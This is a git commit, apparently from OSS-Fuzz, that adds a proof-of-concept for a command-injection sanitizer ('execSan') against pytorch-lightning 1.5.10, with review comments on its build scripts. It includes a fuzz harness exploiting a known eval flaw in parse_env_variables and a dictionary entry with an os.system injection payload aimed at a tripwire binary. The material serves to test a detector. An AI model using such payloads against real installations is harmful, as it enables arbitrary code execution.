author | Dongge Liu <donggeliu@google.com> | 2022-06-09 14:22:41 +1000 |
committer | GitHub <noreply@github.com> | 2022-06-09 14:22:41 +1000 |
commit | ddf48c9a74ed548dd26ca65e4ff0f2e959196118 (patch) | |
tree | e21e548aa965cc2d0f789849358b8a92fc0b034e /infra | |
parent | 4734e40832cf71d50c28bf5c329a9503125f6456 (diff) |
A PoC of `execSan` with `pytorch-lightning-1.5.10` (#7827)
* A PoC of `execSan` with `pytorch-lightning-1.5.10`
Diffstat (limited to 'infra')
6 files changed, 141 insertions, 0 deletions
diff --git a/infra/experimental/sanitizers/ExecSan/Makefile b/infra/experimental/sanitizers/ExecSan/Makefile
index 079a7614..775fa70f 100644
--- a/infra/experimental/sanitizers/ExecSan/Makefile
+++ b/infra/experimental/sanitizers/ExecSan/Makefile
@@ -13,5 +13,11 @@ target: target.cpp
 test: all vuln.dict
 ./execSan ./target -dict=vuln.dict
 
+pytorch-lightning-1.5.10:
+ cp execSan.cpp PoEs/pytorch-lightning-1.5.10/; \
+ cd PoEs/pytorch-lightning-1.5.10/; \
+ docker build . --tag execsan_pytorch-lightning; \
+ docker run -t execsan_pytorch-lightning:latest;
+
 clean:
 rm -f execSan /tmp/tripwire target
diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Dockerfile b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Dockerfile
new file mode 100644
index 00000000..cdc520f0
--- /dev/null
+++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Dockerfile
@@ -0,0 +1,32 @@
+# Copyright 2022 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Build and run the proof of error in pytorch-lightning.
+
+FROM gcr.io/oss-fuzz-base/base-builder-python
+
+RUN apt update && \
+ apt install -y vim && \
+ git clone \
+ --depth 1 \
+ --branch 1.5.10 \
+ https://github.com/PyTorchLightning/pytorch-lightning.git
+
+COPY ./build.sh $SRC
+RUN ./build.sh
+
+COPY . $SRC
+RUN make execSan
+
+CMD ["make", "run"]
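Review bot: The new `pytorch-lightning-1.5.10` recipe chains its steps with `;`, so when `cp execSan.cpp …` or `cd PoEs/…` fails the `docker build .` still runs, in the wrong directory and without the sanitizer source it was meant to pick up. Joining the steps with `&&` stops the recipe at the first failure: `cp execSan.cpp PoEs/pytorch-lightning-1.5.10/ && \`, `cd PoEs/pytorch-lightning-1.5.10/ && \`, `docker build . --tag execsan_pytorch-lightning && \`. The target creates no file of that name, so it should also be declared `.PHONY` together with `test` and `clean`. The `target` rule named in the hunk header lies outside the hunk.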
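Review bot: `git clone --depth 1 --branch 1.5.10` pins the vulnerable tree to a tag, and a tag can be moved or deleted upstream, so this reproducer may silently stop building the version it claims to test; recording the commit and failing the build on a mismatch, e.g. `RUN test "$(git -C pytorch-lightning rev-parse HEAD)" = "<COMMIT_SHA>"` with the placeholder filled from the tag at the time of writing, keeps the PoE honest. `apt install -y vim` reads as a debugging leftover that only grows the image; if it is intentional a comment saying why would help, and clearing `/var/lib/apt/lists/*` after the install is the usual trim. `RUN ./build.sh` assumes the working directory is the `$SRC` that `COPY ./build.sh $SRC` wrote to; that depends on the base image's `WORKDIR`, which is not visible here.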
diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Makefile b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Makefile
new file mode 100644
index 00000000..cc8b5296
--- /dev/null
+++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Makefile
@@ -0,0 +1,12 @@
+.POSIX:
+CXX = clang++
+CFLAGS = -std=c++17 -Wall -Wextra -O3 -g3
+
+execSan: execSan.cpp
+ $(CXX) $(CFLAGS) -lpthread -o $@ $^
+
+run: clean execSan fuzz_pytorch_lightning.py
+ ./execSan ./fuzz_pytorch_lightning.py -dict=vuln.dict
+
+clean:
+ rm -f execSan /tmp/tripwire
diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/build.sh b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/build.sh
new file mode 100755
index 00000000..1c9b1adb
--- /dev/null
+++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/build.sh
@@ -0,0 +1,25 @@
+#!/bin/bash -eu
+# Copyright 2022 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+################################################################################
+
+# Build and install project (using current CFLAGS, CXXFLAGS).
+cd pytorch-lightning
+pip3 install .
+
+# Build fuzzers in $OUT.
+for fuzzer in $(find $SRC -name '*_fuzzer.py'); do
+ compile_python_fuzzer $fuzzer
+done
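Review bot: In the `execSan` rule the library precedes the source, `$(CXX) $(CFLAGS) -lpthread -o $@ $^`; linkers that default to `--as-needed` may discard a library listed before the objects that reference it, so the conventional and portable order is `$(CXX) $(CFLAGS) -o $@ $^ -lpthread`. The flags are C++ flags (`-std=c++17`) but live in `CFLAGS`; `CXXFLAGS` is what make's implicit rules and readers expect next to `clang++`. `run: clean execSan …` only works because serial make builds prerequisites left to right so `clean` runs before `execSan` is rebuilt; under `-j` that order is not guaranteed, so running `$(MAKE) clean` inside the `run` recipe instead of listing it as a prerequisite would be more robust.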
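Review bot: The loop `for fuzzer in $(find $SRC -name '*_fuzzer.py')` never matches the harness this PoE ships, `fuzz_pytorch_lightning.py`, so `compile_python_fuzzer` is never invoked; since the Makefile in the same directory runs the `.py` file directly, the loop is either dead template code to delete or its pattern should become `-name 'fuzz_*.py'` if a compiled fuzzer in `$OUT` is actually wanted. If it stays, `"$SRC"` and `"$fuzzer"` should be quoted: `set -u` is on but unquoted expansions still word-split. `cd pytorch-lightning` presumes the clone is in the current directory, which the Dockerfile's working directory (not visible here) has to guarantee; a one-line comment stating that assumption would help the next reader.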
diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/fuzz_pytorch_lightning.py b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/fuzz_pytorch_lightning.py
new file mode 100755
index 00000000..7d3147ca
--- /dev/null
+++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/fuzz_pytorch_lightning.py
@@ -0,0 +1,65 @@
+#!/usr/local/bin/python3
+#
+# Copyright 2022 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+################################################################################
+"""Exploit pytorch lightning with fuzzer's input as a random env variable.
+
+This PoC is extended from a report in GitHub Advisory Database:
+https://github.com/advisories/GHSA-r5qj-cvf9-p85h
+The original report documents an exploit using a specific environment variable,
+we show a way to achieve the same exploit with an arbitrary env variable.
+"""
+
+import os
+import sys
+import atheris
+
+with atheris.instrument_imports():
+ from pytorch_lightning import Trainer
+ from pytorch_lightning.utilities.argparse import parse_env_variables
+
+
+def prepare_fuzzing_input(data):
+ """Prepare the data needed by the exploit with input data from fuzzers."""
+ data = data.replace(b'\0', b'')
+ env_name = 'AN_ARBITRARY_ENV_NAME'
+ return data, env_name
+
+
+def exploit_target(env_value, env_name):
+ """This target is based on a snippet from the official documentation of
+ `parse_env_variables`:
+ https://pytorch-lightning.readthedocs.io/en/stable/api/pytorch_lightning.utilities.argparse.html # pylint: disable=line-too-long
+ It might not be the most realistic example,
+ but serves as a PoC to show that execSan works for Python."""
+ os.environb[env_name.encode()] = env_value
+ parse_env_variables(Trainer, template=env_name)
+
+
+def TestOneInput(data): # pylint: disable=invalid-name
+ """Exploit the target only with input data from fuzzers."""
+ env_value, env_name = prepare_fuzzing_input(data)
+ exploit_target(env_value, env_name)
+
+
+def main():
+ """Fuzz target with atheris."""
+ atheris.Setup(sys.argv, TestOneInput)
+ atheris.Fuzz()
+
+
+if __name__ == '__main__':
+ main()
diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/vuln.dict b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/vuln.dict
new file mode 100644
index 00000000..0d19aa40
--- /dev/null
+++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/vuln.dict
@@ -0,0 +1 @@
+"os.system('/tmp/tripwire')" |
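Review bot: `data = data.replace(b'\0', b'')` in `prepare_fuzzing_input` is the line that keeps the harness running, yet nothing says why: an environment value cannot contain an embedded NUL, so `os.environb[env_name.encode()] = env_value` in `exploit_target` would raise `ValueError` and atheris would report that as a crash before `parse_env_variables` is ever reached. I would add `# putenv() rejects embedded NUL bytes with ValueError; atheris would count that as a crash.` above that line. The `# pylint: disable=line-too-long` pragma sits inside the docstring of `exploit_target` and therefore becomes part of `__doc__`; moving the documentation URL to a `#` comment above the `def` keeps the docstring clean and the pragma where pylint expects it. The docstring of `TestOneInput` could also state that the fuzzer's bytes are used verbatim as the environment value, since that is the whole contract between `prepare_fuzzing_input` and `exploit_target`.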